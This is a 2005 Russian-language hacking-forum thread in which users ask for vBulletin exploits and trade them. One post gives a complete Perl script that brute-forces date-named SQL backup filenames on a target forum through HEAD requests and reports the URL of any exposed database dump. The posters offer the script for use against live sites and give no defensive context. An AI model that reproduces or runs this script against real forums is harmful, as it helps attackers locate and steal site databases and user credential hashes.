Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.09.2005, 19:38
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
дк мы это и говорим что багов какраз-таки в новых версиях всегда полно, вот только их найти осталось, а сплойты, ну че сплойты, как купишь, со мной поделишься,  |
|
|
11.09.2005, 02:41
|
|
Новичок
Регистрация: 10.09.2005
Сообщений: 2
Провел на форуме:
2929
Репутация:
0
|
|
Интересует, есть ли сплоиты или другие средства взлома для vBulletin 3.0.0 Beta 7 ?
Отпишите плиз. Очень надо.
|
|
|
|
11.09.2005, 03:09
|
|
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592
Репутация:
2175
|
|
Сообщение от creat0r
Интересует, есть ли сплоиты или другие средства взлома для vBulletin 3.0.0 Beta 7 ?
Отпишите плиз. Очень надо.
есть сплойт для <3.0.4, но опять же из серии "дабы-если бы-кабы"
|
|
|
|
11.09.2005, 10:01
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
наскока я помню начиная с 3,0,7 в булках ведется какоето хитрое шифрование, какое именно я не помню. (может быть похоже с ipb 2.0.4)
|
|
|
|
11.09.2005, 19:39
|
|
Новичок
Регистрация: 10.09.2005
Сообщений: 2
Провел на форуме:
2929
Репутация:
0
|
|
Сообщение от ProTeuS
есть сплойт для <3.0.4, но опять же из серии "дабы-если бы-кабы"
Можешь скинуть сплоит этот? Для подробного разбора как говориться... %)
если не трудно на rex2rex@gmail.com
|
|
|
|
12.09.2005, 13:53
|
|
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592
Репутация:
2175
|
|
Сообщение от k1b0rg
наскока я помню начиная с 3,0,7 в булках ведется какоето хитрое шифрование, какое именно я не помню. (может быть похоже с ipb 2.0.4)
Шифрование 4его? если ты про пасы юзверей, то там юзается двойное хеширование с солью, а нас4ет какого-нить шифрование я ни4его пока не слышал...
|
|
|
|
12.09.2005, 13:57
|
|
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592
Репутация:
2175
|
|
Сообщение от creat0r
Можешь скинуть сплоит этот? Для подробного разбора как говориться... %)
если не трудно на rex2rex@gmail.comсей4ас я не дома....скину ближе к выходным (отпиши в ли4ку)...
|
|
|
|
27.09.2005, 12:49
|
|
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022
Репутация:
26
|
|
Exploit Vbulletin 3.0.8 (backup.php) in perl 
Код:
#!/usr/bin/perl
###########################################
# C R O U Z . C O M S E C U R I T Y T E A M #
###########################################
# EXPLOIT FOR: vBULLETIN All Versions Forums Backup Detector #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Vuln Credited By M@FIA From Crouz Security Team #
# #
# Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html #
# #
###########################################
#GR33tz T0 => mh_p0rtal -- Dr-ChephaleX -- The-CepheXin -- Djay_Agoustinno #
# Autumn_Love6 -- Behzad185 -- No_Face_King -- M@FIA # #
# #
# IRANIAN HACKERS AND RESEARCHERS #
# Special Lamerz : Shabgard & Emperor (Two Arabic Lamerz) #
# #
###########################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n===========================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <Target> <DIR>\n\n";
print "===========================\n\n";
print "Examples:\n\n";
print " VbulletinBU.pl www.shabgard.org /Forums/\n\n";
print "You Can Add The Forum Backup Folder \n(It's Default in Forum's Root Directory) \n Example : VbulletinBU.pl www.shabgard.org /Forums/include/ /Alpha Programmer\n\n";
exit();
}
my $host = $ARGV[0];
my $DIR = $ARGV[1];
@Alpha = ('0' , '1' , '2' , '3' , '4' ,'5' , '6' , '7' , '8' , '9' );
foreach $licht0 ( @Alpha ) {
foreach $licht1 ( @Alpha ) {
foreach $licht2 ( @Alpha ) {
foreach $licht3 ( @Alpha ) {
foreach $licht4 ( @Alpha ) {
$crouz = $licht1.$licht2;
$crouz2 = $licht3.$licht4;
$crouz3 = "200";
$crouz3 .= $licht0;
if ($crouz >= 31 ) {
goto LightDoor;
}
if ($crouz2 > 12 ) {
goto LightDoor;
}
if ($crouz3 > 2005 ) {
goto LightDoor;
}
print "forumbackup-$crouz-$crouz2-$crouz3.sql\n";
$Sirius = "forumbackup-$crouz2-$crouz-$crouz3.sql";
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
$http = "HEAD $DIR$Sirius HTTP/1.0\n";
$http .= "Host: $host\n\r\n\r";
print "\n";
print $remote $http;
sleep(1);
while ($sirus=<$remote>)
{
if($sirus =~ "200 OK") {
print "$sirus";
print "Nice ... You Found The BackUp Of VBulletin Forum , See This URL :\n";
print "$host$DIR$Sirius\n\n";
goto start;
}
}
}
LightDoor:
}
}
}
}
start:
#EoF
enjOY néM3S!s
Последний раз редактировалось néM3S!s; 27.09.2005 в 12:54..
|
|
|
|
27.09.2005, 13:02
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524
Репутация:
9
|
|
Итересно... У меня идет строчки типа forumbackup-00-01-2000.sql А где они должны быть?
|
|
|
|
27.09.2005, 13:11
|
|
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022
Репутация:
26
|
|
sorry, I don't understand.. i'm french..
you speak english ?
put your question in english please  ) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
